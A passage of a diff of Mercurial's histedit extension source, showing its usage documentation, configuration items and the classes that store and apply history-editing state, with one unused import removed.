31 # Edit history between c561b4e977df and 7c2fd3b9020c
32 #
32 #
33 # Commits are listed from least to most recent
33 # Commits are listed from least to most recent
34 #
34 #
35 # Commands:
35 # Commands:
36 # p, pick = use commit
36 # p, pick = use commit
37 # e, edit = use commit, but stop for amending
37 # e, edit = use commit, but stop for amending
38 # f, fold = use commit, but combine it with the one above
38 # f, fold = use commit, but combine it with the one above
39 # r, roll = like fold, but discard this commit's description and date
39 # r, roll = like fold, but discard this commit's description and date
40 # d, drop = remove commit from history
40 # d, drop = remove commit from history
41 # m, mess = edit commit message without changing commit content
41 # m, mess = edit commit message without changing commit content
42 # b, base = checkout changeset and apply further changesets from there
42 # b, base = checkout changeset and apply further changesets from there
43 #
43 #
44
44
45 In this file, lines beginning with ``#`` are ignored. You must specify a rule
45 In this file, lines beginning with ``#`` are ignored. You must specify a rule
46 for each revision in your history. For example, if you had meant to add gamma
46 for each revision in your history. For example, if you had meant to add gamma
47 before beta, and then wanted to add delta in the same revision as beta, you
47 before beta, and then wanted to add delta in the same revision as beta, you
48 would reorganize the file to look like this::
48 would reorganize the file to look like this::
49
49
50 pick 030b686bedc4 Add gamma
50 pick 030b686bedc4 Add gamma
51 pick c561b4e977df Add beta
51 pick c561b4e977df Add beta
52 fold 7c2fd3b9020c Add delta
52 fold 7c2fd3b9020c Add delta
53
53
54 # Edit history between c561b4e977df and 7c2fd3b9020c
54 # Edit history between c561b4e977df and 7c2fd3b9020c
55 #
55 #
56 # Commits are listed from least to most recent
56 # Commits are listed from least to most recent
57 #
57 #
58 # Commands:
58 # Commands:
59 # p, pick = use commit
59 # p, pick = use commit
60 # e, edit = use commit, but stop for amending
60 # e, edit = use commit, but stop for amending
61 # f, fold = use commit, but combine it with the one above
61 # f, fold = use commit, but combine it with the one above
62 # r, roll = like fold, but discard this commit's description and date
62 # r, roll = like fold, but discard this commit's description and date
63 # d, drop = remove commit from history
63 # d, drop = remove commit from history
64 # m, mess = edit commit message without changing commit content
64 # m, mess = edit commit message without changing commit content
65 # b, base = checkout changeset and apply further changesets from there
65 # b, base = checkout changeset and apply further changesets from there
66 #
66 #
67
67
68 At which point you close the editor and ``histedit`` starts working. When you
68 At which point you close the editor and ``histedit`` starts working. When you
69 specify a ``fold`` operation, ``histedit`` will open an editor when it folds
69 specify a ``fold`` operation, ``histedit`` will open an editor when it folds
70 those revisions together, offering you a chance to clean up the commit message::
70 those revisions together, offering you a chance to clean up the commit message::
71
71
72 Add beta
72 Add beta
73 ***
73 ***
74 Add delta
74 Add delta
75
75
76 Edit the commit message to your liking, then close the editor. The date used
76 Edit the commit message to your liking, then close the editor. The date used
77 for the commit will be the later of the two commits' dates. For this example,
77 for the commit will be the later of the two commits' dates. For this example,
78 let's assume that the commit message was changed to ``Add beta and delta.``
78 let's assume that the commit message was changed to ``Add beta and delta.``
79 After histedit has run and had a chance to remove any old or temporary
79 After histedit has run and had a chance to remove any old or temporary
80 revisions it needed, the history looks like this::
80 revisions it needed, the history looks like this::
81
81
82 @ 2[tip] 989b4d060121 2009-04-27 18:04 -0500 durin42
82 @ 2[tip] 989b4d060121 2009-04-27 18:04 -0500 durin42
83 | Add beta and delta.
83 | Add beta and delta.
84 |
84 |
85 o 1 081603921c3f 2009-04-27 18:04 -0500 durin42
85 o 1 081603921c3f 2009-04-27 18:04 -0500 durin42
86 | Add gamma
86 | Add gamma
87 |
87 |
88 o 0 d8d2fcd0e319 2009-04-27 18:04 -0500 durin42
88 o 0 d8d2fcd0e319 2009-04-27 18:04 -0500 durin42
89 Add alpha
89 Add alpha
90
90
91 Note that ``histedit`` does *not* remove any revisions (even its own temporary
91 Note that ``histedit`` does *not* remove any revisions (even its own temporary
92 ones) until after it has completed all the editing operations, so it will
92 ones) until after it has completed all the editing operations, so it will
93 probably perform several strip operations when it's done. For the above example,
93 probably perform several strip operations when it's done. For the above example,
94 it had to run strip twice. Strip can be slow depending on a variety of factors,
94 it had to run strip twice. Strip can be slow depending on a variety of factors,
95 so you might need to be a little patient. You can choose to keep the original
95 so you might need to be a little patient. You can choose to keep the original
96 revisions by passing the ``--keep`` flag.
96 revisions by passing the ``--keep`` flag.
97
97
98 The ``edit`` operation will drop you back to a command prompt,
98 The ``edit`` operation will drop you back to a command prompt,
99 allowing you to edit files freely, or even use ``hg record`` to commit
99 allowing you to edit files freely, or even use ``hg record`` to commit
100 some changes as a separate commit. When you're done, any remaining
100 some changes as a separate commit. When you're done, any remaining
101 uncommitted changes will be committed as well. When done, run ``hg
101 uncommitted changes will be committed as well. When done, run ``hg
102 histedit --continue`` to finish this step. If there are uncommitted
102 histedit --continue`` to finish this step. If there are uncommitted
103 changes, you'll be prompted for a new commit message, but the default
103 changes, you'll be prompted for a new commit message, but the default
104 commit message will be the original message for the ``edit`` ed
104 commit message will be the original message for the ``edit`` ed
105 revision, and the date of the original commit will be preserved.
105 revision, and the date of the original commit will be preserved.
106
106
107 The ``message`` operation will give you a chance to revise a commit
107 The ``message`` operation will give you a chance to revise a commit
108 message without changing the contents. It's a shortcut for doing
108 message without changing the contents. It's a shortcut for doing
109 ``edit`` immediately followed by `hg histedit --continue``.
109 ``edit`` immediately followed by `hg histedit --continue``.
110
110
111 If ``histedit`` encounters a conflict when moving a revision (while
111 If ``histedit`` encounters a conflict when moving a revision (while
112 handling ``pick`` or ``fold``), it'll stop in a similar manner to
112 handling ``pick`` or ``fold``), it'll stop in a similar manner to
113 ``edit`` with the difference that it won't prompt you for a commit
113 ``edit`` with the difference that it won't prompt you for a commit
114 message when done. If you decide at this point that you don't like how
114 message when done. If you decide at this point that you don't like how
115 much work it will be to rearrange history, or that you made a mistake,
115 much work it will be to rearrange history, or that you made a mistake,
116 you can use ``hg histedit --abort`` to abandon the new changes you
116 you can use ``hg histedit --abort`` to abandon the new changes you
117 have made and return to the state before you attempted to edit your
117 have made and return to the state before you attempted to edit your
118 history.
118 history.
119
119
120 If we clone the histedit-ed example repository above and add four more
120 If we clone the histedit-ed example repository above and add four more
121 changes, such that we have the following history::
121 changes, such that we have the following history::
122
122
123 @ 6[tip] 038383181893 2009-04-27 18:04 -0500 stefan
123 @ 6[tip] 038383181893 2009-04-27 18:04 -0500 stefan
124 | Add theta
124 | Add theta
125 |
125 |
126 o 5 140988835471 2009-04-27 18:04 -0500 stefan
126 o 5 140988835471 2009-04-27 18:04 -0500 stefan
127 | Add eta
127 | Add eta
128 |
128 |
129 o 4 122930637314 2009-04-27 18:04 -0500 stefan
129 o 4 122930637314 2009-04-27 18:04 -0500 stefan
130 | Add zeta
130 | Add zeta
131 |
131 |
132 o 3 836302820282 2009-04-27 18:04 -0500 stefan
132 o 3 836302820282 2009-04-27 18:04 -0500 stefan
133 | Add epsilon
133 | Add epsilon
134 |
134 |
135 o 2 989b4d060121 2009-04-27 18:04 -0500 durin42
135 o 2 989b4d060121 2009-04-27 18:04 -0500 durin42
136 | Add beta and delta.
136 | Add beta and delta.
137 |
137 |
138 o 1 081603921c3f 2009-04-27 18:04 -0500 durin42
138 o 1 081603921c3f 2009-04-27 18:04 -0500 durin42
139 | Add gamma
139 | Add gamma
140 |
140 |
141 o 0 d8d2fcd0e319 2009-04-27 18:04 -0500 durin42
141 o 0 d8d2fcd0e319 2009-04-27 18:04 -0500 durin42
142 Add alpha
142 Add alpha
143
143
144 If you run ``hg histedit --outgoing`` on the clone then it is the same
144 If you run ``hg histedit --outgoing`` on the clone then it is the same
145 as running ``hg histedit 836302820282``. If you need plan to push to a
145 as running ``hg histedit 836302820282``. If you need plan to push to a
146 repository that Mercurial does not detect to be related to the source
146 repository that Mercurial does not detect to be related to the source
147 repo, you can add a ``--force`` option.
147 repo, you can add a ``--force`` option.
148
148
149 Config
149 Config
150 ------
150 ------
151
151
152 Histedit rule lines are truncated to 80 characters by default. You
152 Histedit rule lines are truncated to 80 characters by default. You
153 can customize this behavior by setting a different length in your
153 can customize this behavior by setting a different length in your
154 configuration file::
154 configuration file::
155
155
156 [histedit]
156 [histedit]
157 linelen = 120 # truncate rule lines at 120 characters
157 linelen = 120 # truncate rule lines at 120 characters
158
158
159 The summary of a change can be customized as well::
159 The summary of a change can be customized as well::
160
160
161 [histedit]
161 [histedit]
162 summary-template = '{rev} {bookmarks} {desc|firstline}'
162 summary-template = '{rev} {bookmarks} {desc|firstline}'
163
163
164 The customized summary should be kept short enough that rule lines
164 The customized summary should be kept short enough that rule lines
165 will fit in the configured line length. See above if that requires
165 will fit in the configured line length. See above if that requires
166 customization.
166 customization.
167
167
168 ``hg histedit`` attempts to automatically choose an appropriate base
168 ``hg histedit`` attempts to automatically choose an appropriate base
169 revision to use. To change which base revision is used, define a
169 revision to use. To change which base revision is used, define a
170 revset in your configuration file::
170 revset in your configuration file::
171
171
172 [histedit]
172 [histedit]
173 defaultrev = only(.) & draft()
173 defaultrev = only(.) & draft()
174
174
175 By default each edited revision needs to be present in histedit commands.
175 By default each edited revision needs to be present in histedit commands.
176 To remove revision you need to use ``drop`` operation. You can configure
176 To remove revision you need to use ``drop`` operation. You can configure
177 the drop to be implicit for missing commits by adding::
177 the drop to be implicit for missing commits by adding::
178
178
179 [histedit]
179 [histedit]
180 dropmissing = True
180 dropmissing = True
181
181
182 By default, histedit will close the transaction after each action. For
182 By default, histedit will close the transaction after each action. For
183 performance purposes, you can configure histedit to use a single transaction
183 performance purposes, you can configure histedit to use a single transaction
184 across the entire histedit. WARNING: This setting introduces a significant risk
184 across the entire histedit. WARNING: This setting introduces a significant risk
185 of losing the work you've done in a histedit if the histedit aborts
185 of losing the work you've done in a histedit if the histedit aborts
186 unexpectedly::
186 unexpectedly::
187
187
188 [histedit]
188 [histedit]
189 singletransaction = True
189 singletransaction = True
190
190
191 """
191 """
192
192
193 from __future__ import absolute_import
193 from __future__ import absolute_import
194
194
195 # chistedit dependencies that are not available everywhere
195 # chistedit dependencies that are not available everywhere
196 try:
196 try:
197 import fcntl
197 import fcntl
198 import termios
198 import termios
199 except ImportError:
199 except ImportError:
200 fcntl = None
200 fcntl = None
201 termios = None
201 termios = None
202
202
203 import functools
203 import functools
204 import locale
205 import os
204 import os
206 import struct
205 import struct
207
206
208 from mercurial.i18n import _
207 from mercurial.i18n import _
209 from mercurial.pycompat import (
208 from mercurial.pycompat import (
210 getattr,
209 getattr,
211 open,
210 open,
212 )
211 )
213 from mercurial import (
212 from mercurial import (
214 bundle2,
213 bundle2,
215 cmdutil,
214 cmdutil,
216 context,
215 context,
217 copies,
216 copies,
218 destutil,
217 destutil,
219 discovery,
218 discovery,
220 encoding,
219 encoding,
221 error,
220 error,
222 exchange,
221 exchange,
223 extensions,
222 extensions,
224 hg,
223 hg,
225 logcmdutil,
224 logcmdutil,
226 merge as mergemod,
225 merge as mergemod,
227 mergestate as mergestatemod,
226 mergestate as mergestatemod,
228 mergeutil,
227 mergeutil,
229 node,
228 node,
230 obsolete,
229 obsolete,
231 pycompat,
230 pycompat,
232 registrar,
231 registrar,
233 repair,
232 repair,
234 rewriteutil,
233 rewriteutil,
235 scmutil,
234 scmutil,
236 state as statemod,
235 state as statemod,
237 util,
236 util,
238 )
237 )
239 from mercurial.utils import (
238 from mercurial.utils import (
240 dateutil,
239 dateutil,
241 stringutil,
240 stringutil,
242 )
241 )
243
242
244 pickle = util.pickle
243 pickle = util.pickle
245 cmdtable = {}
244 cmdtable = {}
246 command = registrar.command(cmdtable)
245 command = registrar.command(cmdtable)
247
246
248 configtable = {}
247 configtable = {}
249 configitem = registrar.configitem(configtable)
248 configitem = registrar.configitem(configtable)
250 configitem(
249 configitem(
251 b'experimental', b'histedit.autoverb', default=False,
250 b'experimental', b'histedit.autoverb', default=False,
252 )
251 )
253 configitem(
252 configitem(
254 b'histedit', b'defaultrev', default=None,
253 b'histedit', b'defaultrev', default=None,
255 )
254 )
256 configitem(
255 configitem(
257 b'histedit', b'dropmissing', default=False,
256 b'histedit', b'dropmissing', default=False,
258 )
257 )
259 configitem(
258 configitem(
260 b'histedit', b'linelen', default=80,
259 b'histedit', b'linelen', default=80,
261 )
260 )
262 configitem(
261 configitem(
263 b'histedit', b'singletransaction', default=False,
262 b'histedit', b'singletransaction', default=False,
264 )
263 )
265 configitem(
264 configitem(
266 b'ui', b'interface.histedit', default=None,
265 b'ui', b'interface.histedit', default=None,
267 )
266 )
268 configitem(b'histedit', b'summary-template', default=b'{rev} {desc|firstline}')
267 configitem(b'histedit', b'summary-template', default=b'{rev} {desc|firstline}')
269
268
270 # Note for extension authors: ONLY specify testedwith = 'ships-with-hg-core' for
269 # Note for extension authors: ONLY specify testedwith = 'ships-with-hg-core' for
271 # extensions which SHIP WITH MERCURIAL. Non-mainline extensions should
270 # extensions which SHIP WITH MERCURIAL. Non-mainline extensions should
272 # be specifying the version(s) of Mercurial they are tested with, or
271 # be specifying the version(s) of Mercurial they are tested with, or
273 # leave the attribute unspecified.
272 # leave the attribute unspecified.
274 testedwith = b'ships-with-hg-core'
273 testedwith = b'ships-with-hg-core'
275
274
276 actiontable = {}
275 actiontable = {}
277 primaryactions = set()
276 primaryactions = set()
278 secondaryactions = set()
277 secondaryactions = set()
279 tertiaryactions = set()
278 tertiaryactions = set()
280 internalactions = set()
279 internalactions = set()
281
280
282
281
283 def geteditcomment(ui, first, last):
282 def geteditcomment(ui, first, last):
284 """ construct the editor comment
283 """ construct the editor comment
285 The comment includes::
284 The comment includes::
286 - an intro
285 - an intro
287 - sorted primary commands
286 - sorted primary commands
288 - sorted short commands
287 - sorted short commands
289 - sorted long commands
288 - sorted long commands
290 - additional hints
289 - additional hints
291
290
292 Commands are only included once.
291 Commands are only included once.
293 """
292 """
294 intro = _(
293 intro = _(
295 b"""Edit history between %s and %s
294 b"""Edit history between %s and %s
296
295
297 Commits are listed from least to most recent
296 Commits are listed from least to most recent
298
297
299 You can reorder changesets by reordering the lines
298 You can reorder changesets by reordering the lines
300
299
301 Commands:
300 Commands:
302 """
301 """
303 )
302 )
304 actions = []
303 actions = []
305
304
306 def addverb(v):
305 def addverb(v):
307 a = actiontable[v]
306 a = actiontable[v]
308 lines = a.message.split(b"\n")
307 lines = a.message.split(b"\n")
309 if len(a.verbs):
308 if len(a.verbs):
310 v = b', '.join(sorted(a.verbs, key=lambda v: len(v)))
309 v = b', '.join(sorted(a.verbs, key=lambda v: len(v)))
311 actions.append(b" %s = %s" % (v, lines[0]))
310 actions.append(b" %s = %s" % (v, lines[0]))
312 actions.extend([b' %s'] * (len(lines) - 1))
311 actions.extend([b' %s'] * (len(lines) - 1))
313
312
314 for v in (
313 for v in (
315 sorted(primaryactions)
314 sorted(primaryactions)
316 + sorted(secondaryactions)
315 + sorted(secondaryactions)
317 + sorted(tertiaryactions)
316 + sorted(tertiaryactions)
318 ):
317 ):
319 addverb(v)
318 addverb(v)
320 actions.append(b'')
319 actions.append(b'')
321
320
322 hints = []
321 hints = []
323 if ui.configbool(b'histedit', b'dropmissing'):
322 if ui.configbool(b'histedit', b'dropmissing'):
324 hints.append(
323 hints.append(
325 b"Deleting a changeset from the list "
324 b"Deleting a changeset from the list "
326 b"will DISCARD it from the edited history!"
325 b"will DISCARD it from the edited history!"
327 )
326 )
328
327
329 lines = (intro % (first, last)).split(b'\n') + actions + hints
328 lines = (intro % (first, last)).split(b'\n') + actions + hints
330
329
331 return b''.join([b'# %s\n' % l if l else b'#\n' for l in lines])
330 return b''.join([b'# %s\n' % l if l else b'#\n' for l in lines])
332
331
333
332
334 class histeditstate(object):
333 class histeditstate(object):
335 def __init__(self, repo):
334 def __init__(self, repo):
336 self.repo = repo
335 self.repo = repo
337 self.actions = None
336 self.actions = None
338 self.keep = None
337 self.keep = None
339 self.topmost = None
338 self.topmost = None
340 self.parentctxnode = None
339 self.parentctxnode = None
341 self.lock = None
340 self.lock = None
342 self.wlock = None
341 self.wlock = None
343 self.backupfile = None
342 self.backupfile = None
344 self.stateobj = statemod.cmdstate(repo, b'histedit-state')
343 self.stateobj = statemod.cmdstate(repo, b'histedit-state')
345 self.replacements = []
344 self.replacements = []
346
345
347 def read(self):
346 def read(self):
348 """Load histedit state from disk and set fields appropriately."""
347 """Load histedit state from disk and set fields appropriately."""
349 if not self.stateobj.exists():
348 if not self.stateobj.exists():
350 cmdutil.wrongtooltocontinue(self.repo, _(b'histedit'))
349 cmdutil.wrongtooltocontinue(self.repo, _(b'histedit'))
351
350
352 data = self._read()
351 data = self._read()
353
352
354 self.parentctxnode = data[b'parentctxnode']
353 self.parentctxnode = data[b'parentctxnode']
355 actions = parserules(data[b'rules'], self)
354 actions = parserules(data[b'rules'], self)
356 self.actions = actions
355 self.actions = actions
357 self.keep = data[b'keep']
356 self.keep = data[b'keep']
358 self.topmost = data[b'topmost']
357 self.topmost = data[b'topmost']
359 self.replacements = data[b'replacements']
358 self.replacements = data[b'replacements']
360 self.backupfile = data[b'backupfile']
359 self.backupfile = data[b'backupfile']
361
360
362 def _read(self):
361 def _read(self):
363 fp = self.repo.vfs.read(b'histedit-state')
362 fp = self.repo.vfs.read(b'histedit-state')
364 if fp.startswith(b'v1\n'):
363 if fp.startswith(b'v1\n'):
365 data = self._load()
364 data = self._load()
366 parentctxnode, rules, keep, topmost, replacements, backupfile = data
365 parentctxnode, rules, keep, topmost, replacements, backupfile = data
367 else:
366 else:
368 data = pickle.loads(fp)
367 data = pickle.loads(fp)
369 parentctxnode, rules, keep, topmost, replacements = data
368 parentctxnode, rules, keep, topmost, replacements = data
370 backupfile = None
369 backupfile = None
371 rules = b"\n".join([b"%s %s" % (verb, rest) for [verb, rest] in rules])
370 rules = b"\n".join([b"%s %s" % (verb, rest) for [verb, rest] in rules])
372
371
373 return {
372 return {
374 b'parentctxnode': parentctxnode,
373 b'parentctxnode': parentctxnode,
375 b"rules": rules,
374 b"rules": rules,
376 b"keep": keep,
375 b"keep": keep,
377 b"topmost": topmost,
376 b"topmost": topmost,
378 b"replacements": replacements,
377 b"replacements": replacements,
379 b"backupfile": backupfile,
378 b"backupfile": backupfile,
380 }
379 }
381
380
382 def write(self, tr=None):
381 def write(self, tr=None):
383 if tr:
382 if tr:
384 tr.addfilegenerator(
383 tr.addfilegenerator(
385 b'histedit-state',
384 b'histedit-state',
386 (b'histedit-state',),
385 (b'histedit-state',),
387 self._write,
386 self._write,
388 location=b'plain',
387 location=b'plain',
389 )
388 )
390 else:
389 else:
391 with self.repo.vfs(b"histedit-state", b"w") as f:
390 with self.repo.vfs(b"histedit-state", b"w") as f:
392 self._write(f)
391 self._write(f)
393
392
394 def _write(self, fp):
393 def _write(self, fp):
395 fp.write(b'v1\n')
394 fp.write(b'v1\n')
396 fp.write(b'%s\n' % node.hex(self.parentctxnode))
395 fp.write(b'%s\n' % node.hex(self.parentctxnode))
397 fp.write(b'%s\n' % node.hex(self.topmost))
396 fp.write(b'%s\n' % node.hex(self.topmost))
398 fp.write(b'%s\n' % (b'True' if self.keep else b'False'))
397 fp.write(b'%s\n' % (b'True' if self.keep else b'False'))
399 fp.write(b'%d\n' % len(self.actions))
398 fp.write(b'%d\n' % len(self.actions))
400 for action in self.actions:
399 for action in self.actions:
401 fp.write(b'%s\n' % action.tostate())
400 fp.write(b'%s\n' % action.tostate())
402 fp.write(b'%d\n' % len(self.replacements))
401 fp.write(b'%d\n' % len(self.replacements))
403 for replacement in self.replacements:
402 for replacement in self.replacements:
404 fp.write(
403 fp.write(
405 b'%s%s\n'
404 b'%s%s\n'
406 % (
405 % (
407 node.hex(replacement[0]),
406 node.hex(replacement[0]),
408 b''.join(node.hex(r) for r in replacement[1]),
407 b''.join(node.hex(r) for r in replacement[1]),
409 )
408 )
410 )
409 )
411 backupfile = self.backupfile
410 backupfile = self.backupfile
412 if not backupfile:
411 if not backupfile:
413 backupfile = b''
412 backupfile = b''
414 fp.write(b'%s\n' % backupfile)
413 fp.write(b'%s\n' % backupfile)
415
414
416 def _load(self):
415 def _load(self):
417 fp = self.repo.vfs(b'histedit-state', b'r')
416 fp = self.repo.vfs(b'histedit-state', b'r')
418 lines = [l[:-1] for l in fp.readlines()]
417 lines = [l[:-1] for l in fp.readlines()]
419
418
420 index = 0
419 index = 0
421 lines[index] # version number
420 lines[index] # version number
422 index += 1
421 index += 1
423
422
424 parentctxnode = node.bin(lines[index])
423 parentctxnode = node.bin(lines[index])
425 index += 1
424 index += 1
426
425
427 topmost = node.bin(lines[index])
426 topmost = node.bin(lines[index])
428 index += 1
427 index += 1
429
428
430 keep = lines[index] == b'True'
429 keep = lines[index] == b'True'
431 index += 1
430 index += 1
432
431
433 # Rules
432 # Rules
434 rules = []
433 rules = []
435 rulelen = int(lines[index])
434 rulelen = int(lines[index])
436 index += 1
435 index += 1
437 for i in pycompat.xrange(rulelen):
436 for i in pycompat.xrange(rulelen):
438 ruleaction = lines[index]
437 ruleaction = lines[index]
439 index += 1
438 index += 1
440 rule = lines[index]
439 rule = lines[index]
441 index += 1
440 index += 1
442 rules.append((ruleaction, rule))
441 rules.append((ruleaction, rule))
443
442
444 # Replacements
443 # Replacements
445 replacements = []
444 replacements = []
446 replacementlen = int(lines[index])
445 replacementlen = int(lines[index])
447 index += 1
446 index += 1
448 for i in pycompat.xrange(replacementlen):
447 for i in pycompat.xrange(replacementlen):
449 replacement = lines[index]
448 replacement = lines[index]
450 original = node.bin(replacement[:40])
449 original = node.bin(replacement[:40])
451 succ = [
450 succ = [
452 node.bin(replacement[i : i + 40])
451 node.bin(replacement[i : i + 40])
453 for i in range(40, len(replacement), 40)
452 for i in range(40, len(replacement), 40)
454 ]
453 ]
455 replacements.append((original, succ))
454 replacements.append((original, succ))
456 index += 1
455 index += 1
457
456
458 backupfile = lines[index]
457 backupfile = lines[index]
459 index += 1
458 index += 1
460
459
461 fp.close()
460 fp.close()
462
461
463 return parentctxnode, rules, keep, topmost, replacements, backupfile
462 return parentctxnode, rules, keep, topmost, replacements, backupfile
464
463
465 def clear(self):
464 def clear(self):
466 if self.inprogress():
465 if self.inprogress():
467 self.repo.vfs.unlink(b'histedit-state')
466 self.repo.vfs.unlink(b'histedit-state')
468
467
469 def inprogress(self):
468 def inprogress(self):
470 return self.repo.vfs.exists(b'histedit-state')
469 return self.repo.vfs.exists(b'histedit-state')
471
470
472
471
473 class histeditaction(object):
472 class histeditaction(object):
474 def __init__(self, state, node):
473 def __init__(self, state, node):
475 self.state = state
474 self.state = state
476 self.repo = state.repo
475 self.repo = state.repo
477 self.node = node
476 self.node = node
478
477
479 @classmethod
478 @classmethod
480 def fromrule(cls, state, rule):
479 def fromrule(cls, state, rule):
481 """Parses the given rule, returning an instance of the histeditaction.
480 """Parses the given rule, returning an instance of the histeditaction.
482 """
481 """
483 ruleid = rule.strip().split(b' ', 1)[0]
482 ruleid = rule.strip().split(b' ', 1)[0]
484 # ruleid can be anything from rev numbers, hashes, "bookmarks" etc
483 # ruleid can be anything from rev numbers, hashes, "bookmarks" etc
485 # Check for validation of rule ids and get the rulehash
484 # Check for validation of rule ids and get the rulehash
486 try:
485 try:
487 rev = node.bin(ruleid)
486 rev = node.bin(ruleid)
488 except TypeError:
487 except TypeError:
489 try:
488 try:
490 _ctx = scmutil.revsingle(state.repo, ruleid)
489 _ctx = scmutil.revsingle(state.repo, ruleid)
491 rulehash = _ctx.hex()
490 rulehash = _ctx.hex()
492 rev = node.bin(rulehash)
491 rev = node.bin(rulehash)
493 except error.RepoLookupError:
492 except error.RepoLookupError:
494 raise error.ParseError(_(b"invalid changeset %s") % ruleid)
493 raise error.ParseError(_(b"invalid changeset %s") % ruleid)
495 return cls(state, rev)
494 return cls(state, rev)
496
495
497 def verify(self, prev, expected, seen):
496 def verify(self, prev, expected, seen):
498 """ Verifies semantic correctness of the rule"""
497 """ Verifies semantic correctness of the rule"""
499 repo = self.repo
498 repo = self.repo
500 ha = node.hex(self.node)
499 ha = node.hex(self.node)
501 self.node = scmutil.resolvehexnodeidprefix(repo, ha)
500 self.node = scmutil.resolvehexnodeidprefix(repo, ha)
502 if self.node is None:
501 if self.node is None:
503 raise error.ParseError(_(b'unknown changeset %s listed') % ha[:12])
502 raise error.ParseError(_(b'unknown changeset %s listed') % ha[:12])
504 self._verifynodeconstraints(prev, expected, seen)
503 self._verifynodeconstraints(prev, expected, seen)
505
504
506 def _verifynodeconstraints(self, prev, expected, seen):
505 def _verifynodeconstraints(self, prev, expected, seen):
507 # by default command need a node in the edited list
506 # by default command need a node in the edited list
508 if self.node not in expected:
507 if self.node not in expected:
509 raise error.ParseError(
508 raise error.ParseError(
510 _(b'%s "%s" changeset was not a candidate')
509 _(b'%s "%s" changeset was not a candidate')
511 % (self.verb, node.short(self.node)),
510 % (self.verb, node.short(self.node)),
512 hint=_(b'only use listed changesets'),
511 hint=_(b'only use listed changesets'),
513 )
512 )
514 # and only one command per node
513 # and only one command per node
515 if self.node in seen:
514 if self.node in seen:
516 raise error.ParseError(
515 raise error.ParseError(
517 _(b'duplicated command for changeset %s')
516 _(b'duplicated command for changeset %s')
518 % node.short(self.node)
517 % node.short(self.node)
519 )
518 )
520
519
521 def torule(self):
520 def torule(self):
522 """build a histedit rule line for an action
521 """build a histedit rule line for an action
523
522
524 by default lines are in the form:
523 by default lines are in the form:
525 <hash> <rev> <summary>
524 <hash> <rev> <summary>
526 """
525 """
527 ctx = self.repo[self.node]
526 ctx = self.repo[self.node]
528 ui = self.repo.ui
527 ui = self.repo.ui
529 summary = (
528 summary = (
530 cmdutil.rendertemplate(
529 cmdutil.rendertemplate(
531 ctx, ui.config(b'histedit', b'summary-template')
530 ctx, ui.config(b'histedit', b'summary-template')
532 )
531 )
533 or b''
532 or b''
534 )
533 )
535 summary = summary.splitlines()[0]
534 summary = summary.splitlines()[0]
536 line = b'%s %s %s' % (self.verb, ctx, summary)
535 line = b'%s %s %s' % (self.verb, ctx, summary)
537 # trim to 75 columns by default so it's not stupidly wide in my editor
536 # trim to 75 columns by default so it's not stupidly wide in my editor
538 # (the 5 more are left for verb)
537 # (the 5 more are left for verb)
539 maxlen = self.repo.ui.configint(b'histedit', b'linelen')
538 maxlen = self.repo.ui.configint(b'histedit', b'linelen')
540 maxlen = max(maxlen, 22) # avoid truncating hash
539 maxlen = max(maxlen, 22) # avoid truncating hash
541 return stringutil.ellipsis(line, maxlen)
540 return stringutil.ellipsis(line, maxlen)
542
541
543 def tostate(self):
542 def tostate(self):
544 """Print an action in format used by histedit state files
543 """Print an action in format used by histedit state files
545 (the first line is a verb, the remainder is the second)
544 (the first line is a verb, the remainder is the second)
546 """
545 """
547 return b"%s\n%s" % (self.verb, node.hex(self.node))
546 return b"%s\n%s" % (self.verb, node.hex(self.node))
548
547
549 def run(self):
548 def run(self):
550 """Runs the action. The default behavior is simply apply the action's
549 """Runs the action. The default behavior is simply apply the action's
551 rulectx onto the current parentctx."""
550 rulectx onto the current parentctx."""
552 self.applychange()
551 self.applychange()
553 self.continuedirty()
552 self.continuedirty()
554 return self.continueclean()
553 return self.continueclean()
555
554
556 def applychange(self):
555 def applychange(self):
557 """Applies the changes from this action's rulectx onto the current
556 """Applies the changes from this action's rulectx onto the current
558 parentctx, but does not commit them."""
557 parentctx, but does not commit them."""
559 repo = self.repo
558 repo = self.repo
560 rulectx = repo[self.node]
559 rulectx = repo[self.node]
561 repo.ui.pushbuffer(error=True, labeled=True)
560 repo.ui.pushbuffer(error=True, labeled=True)
562 hg.update(repo, self.state.parentctxnode, quietempty=True)
561 hg.update(repo, self.state.parentctxnode, quietempty=True)
563 repo.ui.popbuffer()
562 repo.ui.popbuffer()
564 stats = applychanges(repo.ui, repo, rulectx, {})
563 stats = applychanges(repo.ui, repo, rulectx, {})
565 repo.dirstate.setbranch(rulectx.branch())
564 repo.dirstate.setbranch(rulectx.branch())
566 if stats.unresolvedcount:
565 if stats.unresolvedcount:
567 raise error.InterventionRequired(
566 raise error.InterventionRequired(
568 _(b'Fix up the change (%s %s)')
567 _(b'Fix up the change (%s %s)')
569 % (self.verb, node.short(self.node)),
568 % (self.verb, node.short(self.node)),
570 hint=_(b'hg histedit --continue to resume'),
569 hint=_(b'hg histedit --continue to resume'),
571 )
570 )
572
571
573 def continuedirty(self):
572 def continuedirty(self):
574 """Continues the action when changes have been applied to the working
573 """Continues the action when changes have been applied to the working
575 copy. The default behavior is to commit the dirty changes."""
574 copy. The default behavior is to commit the dirty changes."""
576 repo = self.repo
575 repo = self.repo
577 rulectx = repo[self.node]
576 rulectx = repo[self.node]
578
577
579 editor = self.commiteditor()
578 editor = self.commiteditor()
580 commit = commitfuncfor(repo, rulectx)
579 commit = commitfuncfor(repo, rulectx)
581 if repo.ui.configbool(b'rewrite', b'update-timestamp'):
580 if repo.ui.configbool(b'rewrite', b'update-timestamp'):
582 date = dateutil.makedate()
581 date = dateutil.makedate()
583 else:
582 else:
584 date = rulectx.date()
583 date = rulectx.date()
585 commit(
584 commit(
586 text=rulectx.description(),
585 text=rulectx.description(),
587 user=rulectx.user(),
586 user=rulectx.user(),
588 date=date,
587 date=date,
589 extra=rulectx.extra(),
588 extra=rulectx.extra(),
590 editor=editor,
589 editor=editor,
591 )
590 )
592
591
593 def commiteditor(self):
592 def commiteditor(self):
594 """The editor to be used to edit the commit message."""
593 """The editor to be used to edit the commit message."""
595 return False
594 return False
596
595
597 def continueclean(self):
596 def continueclean(self):
598 """Continues the action when the working copy is clean. The default
597 """Continues the action when the working copy is clean. The default
599 behavior is to accept the current commit as the new version of the
598 behavior is to accept the current commit as the new version of the
600 rulectx."""
599 rulectx."""
601 ctx = self.repo[b'.']
600 ctx = self.repo[b'.']
602 if ctx.node() == self.state.parentctxnode:
601 if ctx.node() == self.state.parentctxnode:
603 self.repo.ui.warn(
602 self.repo.ui.warn(
604 _(b'%s: skipping changeset (no changes)\n')
603 _(b'%s: skipping changeset (no changes)\n')
605 % node.short(self.node)
